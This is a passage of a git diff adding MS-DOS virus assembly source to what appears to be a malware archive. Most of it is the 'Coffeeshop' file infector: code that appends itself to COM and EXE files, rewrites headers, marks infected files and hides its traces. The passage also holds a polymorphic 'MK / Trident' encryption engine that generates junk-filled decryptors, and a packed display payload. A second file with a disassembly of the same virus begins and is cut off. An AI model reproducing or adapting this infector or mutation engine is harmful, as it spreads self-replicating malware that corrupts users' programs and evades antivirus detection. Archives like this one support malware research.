read + jc closev + + mov ax,4202 ;goto end, get filelength + xor cx,cx + cwd + int 21 + + mov di,offset oldlen ;save filelength + mov [di],ax + mov [di+2],dx + + mov ax,word ptr [si+12] ;already infected? + add al,ah + cmp al,'@' + jz closev + + cmp word ptr [si],'ZM' ;EXE ? + je do_EXE + +do_COM: test byte ptr [si],80 ;maybe a strange EXE? + jz closev + + mov ax,word ptr [di] ;check lenght of file + cmp ah,0D0 + jae closev + cmp ah,1 + jb closev + + mov dx,ax + add dx,0100 + call writeprog ;call Engine and write virus + jne closev + + mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin + sub ax,low 3 + mov word ptr [si+1],ax + jmp done + +closev: jmp close + +do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? + jb not_win + + mov ax,003C + cwd + call readbytes + jc closev + + mov ax,word ptr [di+8] + mov dx,word ptr [di+0A] + call readbytes + jc closev + + cmp byte ptr [di+9],'E' + je closev + +not_win: call getlen + call calclen ;check for internal overlays + cmp word ptr [si+4],ax + jne close + cmp word ptr [si+2],dx + jne close + + cmp word ptr [si+0C],0 ;high memory allocation? + je close + + cmp word ptr [si+1A],0 ;overlay nr. not zero? + jne close + + call getlen ;calculate new CS & IP + mov cx,0010 + div cx + sub ax,word ptr [si+8] + dec ax + add dx,low 10 + + call writeprog ;call Engine and write virus + jne close + + mov word ptr [si+16],ax ;put CS in header + mov word ptr [si+0E],ax ;put SS in header + mov word ptr [si+14],dx ;put IP in header + mov word ptr [si+10],STACKOFF ;put SP in header + + call getlen + add ax,cx + adc dx,0 + call calclen ;put new length in header + mov word ptr [si+4],ax + mov word ptr [si+2],dx + + lea di,[si+0A] ;adjust mem. allocation info + call mem_adjust + lea di,[si+0C] + call mem_adjust + +done: call gotobegin + call rnd_get ;signature + mov ah,'@' + sub ah,al + mov word ptr [si+12],ax + mov cx,BUFLEN ;write new begin + mov dx,si + mov ah,40 + int 21 + +close: pop cx ;restore date & time + pop dx + mov ax,5701 + int 21 + + mov ah,3E ;close the file + int 21 + +return1: pop ax ;restore attributes + pop cx + cwd + int 21 + + pop ax ;restore int24 vector + pop dx + pop ds + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + ret + + +;****************************************************************************** +;* Filenames to avoid +;****************************************************************************** + +names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' + db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' + db ' ', ' ', ' ' + + +;****************************************************************************** +;* Write virus to the program +;****************************************************************************** + +writeprog: push ax ;save registers + push dx + push si + push bp + push es + + cli + mov word ptr [di-4],ss ;save SS & SP + mov word ptr [di-2],sp + + mov ax,cs ;new stack & buffer-segment + mov ss,ax + mov sp,((VIRPAR + WORKPAR) * 10) + add ax,low VIRPAR + mov es,ax + sti + + push ds + + mov bp,dx ;input parameters for engine + mov dx,0100 + mov cx,FILELEN + xor si,si + mov al,0Fh + + push di + push bx + + call crypt ;call the Engine + + pop bx + pop di + + push cx + push dx + mov ax,4202 ;goto end + xor cx,cx + cwd + int 21 + pop dx + pop cx + + mov ah,40 ;write virus + int 21 + cmp ax,cx ;are all bytes written? + + pop ds + + cli + mov ss,word ptr [di-4] ;restore stack + mov sp,word ptr [di-2] + sti + + pop es ;restore registers + pop bp + pop si + pop dx + pop ax + + ret + + +;****************************************************************************** +;* Adjust mem allocation info in EXE header +;****************************************************************************** + +mem_adjust: mov ax,[di] + sub ax,low FILEPAR ;alloc. may be this much less + jb more + cmp ax,DATAPAR ;minimum amount to allocate + jae mem_ok +more: mov ax,DATAPAR +mem_ok: mov [di],ax + ret + + +;****************************************************************************** +;* Read a few bytes +;****************************************************************************** + +readbytes: call goto + mov dx,offset minibuf + mov cx,4 +read: mov ah,3F + int 21 + ret + + +;****************************************************************************** +;* Calculate length for EXE header +;****************************************************************************** + +calclen: mov cx,0200 + div cx + or dx,dx + jz no_cor + inc ax +no_cor: ret + + +;****************************************************************************** +;* Get original length of program +;****************************************************************************** + +getlen: mov ax,[di] + mov dx,[di+2] + ret + + +;****************************************************************************** +;* Goto new offset DX:AX +;****************************************************************************** + +gotobegin: xor ax,ax + cwd +goto: xchg cx,dx + xchg ax,dx + mov ax,4200 + int 21 + ret + + +;**************************************************************************** +;* +;* Encryption Engine +;* +;* +;* Input: ES work segment +;* DS:DX code to encrypt +;* BP what will be start of decryptor +;* SI what will be distance between decryptor and code +;* CX length of code +;* AX flags: bit 0: DS will not be equal to CS +;* bit 1: insert random instructions +;* bit 2: put junk before decryptor +;* bit 3: preserve AX with decryptor +;* +;* Output: ES: work segment (preserved) +;* DS:DX decryptor + encrypted code +;* BP what will be start of decryptor (preserved) +;* DI length of decryptor / offset of encrypted code +;* CX length of decryptor + encrypted code +;* AX length of encrypted code +;* (other registers may be trashed) +;* +;**************************************************************************** + + db '[ MK / Trident ]' + +crypt: xor di,di ;di = start of decryptor + push dx ;save offset of code + push si ;save future offset of code + + mov byte ptr ds:[flags],al ;save flags + test al,8 ;push AX? + jz no_push + mov al,50 + stosb + +no_push: call rnd_get ;add a few bytes to cx + and ax,1F + add cx,ax + push cx ;save length of code + + call rnd_get ;get random flags + xchg ax,bx + ;BX flags: + + ;0,1 how to encrypt + ;2,3 which register for encryption + ;4 use byte or word for encrypt + ;5 MOV AL, MOV AH or MOV AX + ;6 MOV CL, MOV CH or MOV CX + ;7 AX or DX + + ;8 count up or down + ;9 ADD/SUB/INC/DEC or CMPSW/SCASW + ;A ADD/SUB or INC/DEC + ; CMPSW or SCASW + ;B offset in XOR instruction? + ;C LOOPNZ or LOOP + ; SUB CX or DEC CX + ;D carry with crypt ADD/SUB + ;E carry with inc ADD/SUB + ;F XOR instruction value or AX/DX + +random: call rnd_get ;get random encryption value + or al,al + jz random ;again if 0 + mov ds:[xor_val],ax + + call do_junk ;insert random instructions + + pop cx + + mov ax,0111 ;make flags to remember which + test bl,20 ; MOV instructions are used + jnz z0 + xor al,07 +z0: test bl,0C + jnz z1 + xor al,70 +z1: test bl,40 + jnz z2 + xor ah,7 +z2: test bl,10 + jnz z3 + and al,73 +z3: test bh,80 + jnz z4 + and al,70 + +z4: mov dx,ax +mov_lup: call rnd_get ;put MOV instructions in + and ax,000F ; a random order + cmp al,0A + ja mov_lup + + mov si,ax + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + jz mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + + or dx,dx ;all MOVs done? + jnz mov_lup + + push di ;save start of decryptor loop + + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20 ;carry with ADD/SUB ? + jz no_clc + mov al,0F8 + stosb +no_clc: mov word ptr ds:[xor_offset],0 + call do_xor ;place all loop instructions + call do_nop + call do_add + + pop dx ;get start of decryptor loop + + call do_loop + + test byte ptr ds:[flags],8 ;insert POP AX ? + jz no_pop + mov al,58 + stosb + +no_pop: xor ax,ax ;calculate loop offset + test bh,1 ;up or down? + jz v1 + mov ax,cx + dec ax + test bl,10 ;encrypt with byte or word? + jz v1 + and al,0FE +v1: add ax,di + add ax,bp + pop si + add ax,si + sub ax,word ptr ds:[xor_offset] + mov si,word ptr ds:[where_len] + test bl,0C ;are BL,BH used for encryption? + jnz v2 + mov byte ptr es:[si],al + mov si,word ptr ds:[where_len2] + mov byte ptr es:[si],ah + jmp short v3 +v2: mov word ptr es:[si],ax + +v3: mov dx,word ptr ds:[xor_val] ;encryption value + + pop si ;ds:si = start of code + + push di ;save ptr to encrypted code + push cx ;save length of encrypted code + + test bl,10 ;byte or word? + jz blup + + inc cx ;cx = # of crypts (words) + shr cx,1 + +lup: lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + + +blup: lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: mov cx,di ;cx = length decryptpr + code + pop ax ;ax = length of decrypted code + pop di ;di = offset encrypted code + xor dx,dx ;ds:dx = decryptor + cr. code + push es + pop ds + ret + + +;**************************************************************************** +;* encrypt the code +;**************************************************************************** + +do_encrypt: add dx,word ptr ds:[add_val] + test bl,2 + jnz lup1 + xor ax,dx + ret + +lup1: test bl,1 + jnz lup2 + sub ax,dx + ret + +lup2: add ax,dx + ret + + +;**************************************************************************** +;* generate mov reg,xxxx +;**************************************************************************** + +do_mov: mov dx,si + mov al,byte ptr ds:[si+mov_byte] + cmp dl,4 ;BX? + jne is_not_bx + call add_ind +is_not_bx: test dl,0C ;A*? + pushf + jnz is_not_a + test bl,80 ;A* or D*? + jz is_not_a + add al,2 + +is_not_a: call alter ;insert the MOV + + popf ;A*? + jnz is_not_a2 + mov ax,word ptr ds:[xor_val] + jmp short sss + +is_not_a2: test dl,8 ;B*? + jnz is_not_b + mov si,offset where_len + test dl,2 + jz is_not_bh + add si,2 +is_not_bh: mov word ptr ds:[si],di + jmp short sss + +is_not_b: mov ax,cx ;C* + test bl,10 ;byte or word encryption? + jz sss + inc ax ;only half the number of bytes + shr ax,1 +sss: test dl,3 ;byte or word register? + jz is_x + test dl,2 ;*H? + jz is_not_h + xchg al,ah +is_not_h: stosb + ret + +is_x: stosw + ret + + +;**************************************************************************** +;* insert MOV or alternative for MOV +;**************************************************************************** + +alter: push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + jz no_alter + + push ax + and bx,0F + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,7 + mov cl,9 + xchg ax,cx + mul cl + + add ax,30C0 + xchg al,ah + test bl,4 + jz no_sub + mov al,28 +no_sub: call maybe_2 + stosw + + mov al,80 + call maybe_2 + stosb + + mov ax,offset add_mode + xchg ax,bx + and ax,3 + xlat + + add al,cl +no_alter: stosb + pop cx + pop bx + ret + + +;**************************************************************************** +;* insert ADD AX,xxxx +;**************************************************************************** + +do_add_ax: push cx + mov si,offset add_val ;save add-value here + mov word ptr ds:[si],0 + mov ax,bx + and ax,8110 + xor ax,8010 + jnz no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jnz no_add_ax ;use ADD? + + test bl,80 + jnz do_81C2 ;AX or DX? + mov al,5 + stosb + jmp short do_add0 +do_81C2: mov ax,0C281 + stosw +do_add0: call rnd_get + mov word ptr ds:[si],ax + stosw +no_add_ax: pop cx + ret + + +;**************************************************************************** +;* generate encryption command +;**************************************************************************** + +do_xor: test byte ptr ds:[flags],1 + jz no_cs + mov al,2E ;insert CS: instruction + stosb + +no_cs: test bh,80 ;type of XOR command + jz xor1 + + call get_xor ;encrypt with register + call do_carry + call save_it + xor ax,ax + test bl,80 + jz xxxx + add al,10 +xxxx: call add_dir + test bh,8 + jnz yyyy + stosb + ret + +yyyy: or al,80 + stosb + call rnd_get + stosw + mov word ptr ds:[xor_offset],ax + ret + +xor1: mov al,080 ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:[xor_val] + test bl,10 + jmp byte_word + + +;**************************************************************************** +;* generate increase/decrease command +;**************************************************************************** + +do_add: test bl,8 ;no CMPSW/SCASW if BX is used + jz da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jnz do_cmpsw + +da0: test bh,4 ;ADD/SUB or INC/DEC? + jz add1 + + mov al,40 ;INC/DEC + test bh,1 ;up or down? + jz add0 + add al,8 +add0: call add_ind + stosb + test bl,10 ;byte or word? + jz return + stosb ;same instruction again +return: ret + +add1: test bh,40 ;ADD/SUB + jz no_clc2 ;carry? + mov al,0F8 ;insert CLC + stosb +no_clc2: mov al,083 + stosb + mov al,0C0 + test bh,1 ;up or down? + jz add2 + mov al,0E8 +add2: test bh,40 ;carry? + jz no_ac2 + and al,0CF + or al,10 +no_ac2: call add_ind + stosb + mov al,1 ;value to add/sub +save_it: call add_1 + stosb + ret + +do_cmpsw: test bh,1 ;up or down? + jz no_std + mov al,0FDh ;insert STD + stosb +no_std: test bh,4 ;CMPSW or SCASW? + jz normal_cmpsw + test bl,4 ;no SCASW if SI is used + jnz do_scasw + +normal_cmpsw: mov al,0A6 ;CMPSB + jmp short save_it +do_scasw: mov al,0AE ;SCASB + jmp short save_it + + +;**************************************************************************** +;* generate loop command +;**************************************************************************** + +do_loop: test bh,1 ;no JNE if couting down + jnz loop_loop ; (prefetch bug!) + call rnd_get + test al,1 ;LOOPNZ/LOOP or JNE? + jnz cx_loop + +loop_loop: mov al,0E0 + test bh,1A ;LOOPNZ or LOOP? + jz ll0 ; no LOOPNZ if xor-offset + add al,2 ; no LOOPNZ if CMPSW/SCASW +ll0: stosb + mov ax,dx + sub ax,di + dec ax + stosb + ret + +cx_loop: test bh,10 ;SUB CX or DEC CX? + jnz cxl_dec + mov ax,0E983 + stosw + mov al,1 + stosb + jmp short do_jne + +cxl_dec: mov al,49 + stosb +do_jne: mov al,75 + jmp short ll0 + + +;**************************************************************************** +;* add value to AL depending on register type +;**************************************************************************** + +add_dir: mov si,offset dir_change + jmp short xx1 + +add_ind: mov si,offset ind_change +xx1: push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr ds:[bx+si] + pop bx + ret + + +;**************************************************************************** +;* mov encryption command byte to AL +;**************************************************************************** + +get_xor: push bx + mov ax,offset how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + ret + + +;**************************************************************************** +;* change ADD into ADC +;**************************************************************************** + +do_carry: test bl,2 ;ADD/SUB used for encryption? + jz no_ac + test bh,20 ;carry with (encr.) ADD/SUB? + jz no_ac + and al,0CF + or al,10 +no_ac: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +add_1: test bl,10 + jz add_1_ret + inc al +add_1_ret: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +maybe_2: call add_1 + cmp al,81 ;can't touch this + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + jz maybe_not + add al,2 +maybe_not: ret + + +;**************************************************************************** +;* get random nop (or not) +;**************************************************************************** + +do_nop: test byte ptr ds:[flags],2 + jz no_nop +yes_nop: call rnd_get + test al,3 + jz nop8 + test al,2 + jz nop16 + test al,1 + jz nop16x +no_nop: ret + + +;**************************************************************************** +;* Insert random instructions +;**************************************************************************** + +do_junk: test byte ptr ds:[flags],4 + jz no_junk + call rnd_get ;put a random number of + and ax,0F ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop +no_junk: ret + + +;**************************************************************************** +;* get rough random nop (may affect register values) +;**************************************************************************** + +junk: call rnd_get + and ax,1E + jmp short aa0 +nop16x: call rnd_get + and ax,06 +aa0: xchg ax,si + call rnd_get + jmp word ptr ds:[si+junkcals] + + +;**************************************************************************** +;* NOP and junk addresses +;**************************************************************************** + +junkcals dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + + +;**************************************************************************** +;* NOP and junk routines +;**************************************************************************** + +nop16x0: and ax,000F ;J* 0000 (conditional) + or al,70 + stosw + ret + + +nop16x1: mov al,0EBh ;JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg al,ah ;get lenght of bullshit + cbw + jmp fill_bullshit + + +nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg + stosb + ret + + +nop16x3: call junkF ;INC / DEC or DEC / INC + xor al,8 + stosb + ret + + +nop8: push bx ;8-bit NOP + and al,7 + mov bx,offset nop_data8 + xlat + stosb + pop bx + ret + + +nop16: push bx ;16-bit NOP + and ax,0303 + mov bx,offset nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0C0 + stosb + pop bx + ret + + +junk6: push cx ;CALL xxxx / junk / POP reg + mov al,0E8 + and ah,0F + inc ah + stosw + xor al,al + stosb + xchg al,ah + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58 + stosb + + test ch,3 ;more? + jnz junk6_ret + + call do_nop + mov ax,0F087 ;insert XCHG SI,reg + or ah,cl + test ch,8 + jz j6_1 + mov al,8Bh +j6_1: stosw + + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0F7FBh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx +junk6_ret: pop cx + ret + + +junk7: and al,0F ;MOV reg,xxxx + or al,0B0 + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + + +junk8: and ah,39 ;DO r/m,r(8/16) + or al,0C0 + call no_sp + xchg al,ah + stosw + ret + + +junk9: and al,3Bh ;DO r(8/16),r/m + or al,2 + and ah,3F + call no_sp2 + call no_bp + stosw + ret + + +junkA: and ah,1 ;DO rm,xxxx + or ax,80C0 + call no_sp + xchg al,ah + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + + +junkB: call nop8 ;NOP / LOOP + mov ax,0FDE2 + stosw + ret + + +junkC: and al,09 ;CMPS* or SCAS* + test ah,1 + jz mov_test + or al,0A6 + stosb + ret +mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0A8 + pushf + call rnd_get + popf + jmp short byte_word + + +junkD: and al,07 ;XCHG AX,reg + or al,90 + call no_sp + stosb + ret + + +junkE: and ah,07 ;PUSH reg / POP reg + or ah,50 + mov al,ah + or ah,08 + stosw + ret + + +junkF: and al,0F ;INC / DEC + or al,40 + call no_sp + stosb + ret + + +;**************************************************************************** +;* store a byte or a word +;**************************************************************************** + +byte_word: jz only_byte + stosw + ret + +only_byte: stosb + ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp: push ax + and al,7 + cmp al,4 + pop ax + jnz no_sp_ret + and al,0FBh +no_sp_ret: ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp2: push ax + and ah,38 + cmp ah,20 + pop ax + jnz no_sp2_ret + xor ah,20 +no_sp2_ret: ret + + +;**************************************************************************** +;* don't use [BP+..] +;**************************************************************************** + +no_bp: test ah,4 + jnz no_bp2 + and ah,0FDh + ret + +no_bp2: push ax + and ah,7 + cmp ah,6 + pop ax + jnz no_bp_ret + or ah,1 +no_bp_ret: ret + + +;**************************************************************************** +;* write byte for JMP/CALL and fill with random bullshit +;**************************************************************************** + +fill_bullshit: push cx + xchg ax,cx +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + ret + + +;**************************************************************************** +;* random number generator (stolen from 'Bomber') +;**************************************************************************** + +rnd_init: push cx + call rnd_init0 ;init + and ax,000F + inc ax + xchg ax,cx +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + pop cx + ret + +rnd_init0: push dx ;initialize generator + push cx + mov ah,2C + int 21 + in al,40 + mov ah,al + in al,40 + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_get: push dx ;calculate a random number + push cx + push bx + mov ax,0 ;will be: mov ax,xxxx + mov dx,0 ; and mov dx,xxxx + mov cx,7 +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_l2 + inc al +rnd_l2: loop rnd_lup + pop bx + +move_rnd: mov word ptr ds:[rnd_get+4],ax + mov word ptr ds:[rnd_get+7],dx + mov al,dl + pop cx + pop dx + ret + + +;**************************************************************************** +;* tables for engine +;**************************************************************************** + + ; AX AL AH (BX) BL BH CX CL CH +mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5 + + ; nop clc stc cmc cli cld incbp decbp +nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh + + ; or and xchg mov +nop_data16 db 8, 20, 84, 88 + + ; bl/bh, bx, si di +dir_change db 07, 07, 04, 05 +ind_change db 03, 03, 06, 07 + + + ; xor xor add sub +how_mode db 30, 30, 00, 28 + + ; ? add xor or +add_mode db 0, 0C8, 0F0, 0C0 + + +;**************************************************************************** +;* text + buffer +;**************************************************************************** + + db ' Amsterdam = COFFEESHOP! ' + +buffer db 0CDh, 20 ;original code of dummy program + db (BUFLEN-2) dup (?) + + +;**************************************************************************** +;* the (packed) picture routine +;**************************************************************************** + +beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h + db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh + db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh + db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h + db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h + db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h + db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch + db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h + db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh + db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh + db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h + db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch + db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h + db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh + db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh + db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh + db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh + db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h + db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h + db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h + db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h + db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh + db 0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h + db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h + db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h + db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h + db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h + db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h + db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h + db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh + db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch + db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh + db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h + db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh + db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh + db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh + db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h + db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h + db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh + db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h + db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh + db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh + db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h + db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h + db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h + db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h + db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h + db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h + db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh + db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h + db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh + db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh + db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h + db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh + db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h + db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh + db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h + db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h + db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh + db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h + db 072h, 0C0h, 062h, 040h, 00Eh, 06Ch, 07Bh, 047h + db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h + db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh + db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h + db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh + db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h + db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h + db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h + db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h + db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh + db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh + db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh + db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h + db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h + db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h + db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h + db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h + db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h + db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh + db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh + db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h + db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h + db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah + db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h + db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh + db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h + db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh + db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah + db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h + db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh + db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h + db 0E9h, 07Dh, 0EBh + +last: + +_TEXT ends + end first + + diff --git a/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm b/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm new file mode 100644 index 00000000..b0984d55 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.coffshp1.asm @@ -0,0 +1,825 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 COFFSHP1 圹 +;圹 圹 +;圹 Created: 23-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: AW 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 0F8h +data_2e equ 0FAh +data_3e equ 43Bh +data_4e equ 0F4h +data_5e equ 0F8h +data_6e equ 0FCh +data_15e equ 15A1h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +coffshp1 proc far + +start: + jmp loc_2 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+di],ah + inc ax + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + int 20h ; DOS program terminate + db 27 dup (0) +loc_2: + call sub_2 + +coffshp1 endp + 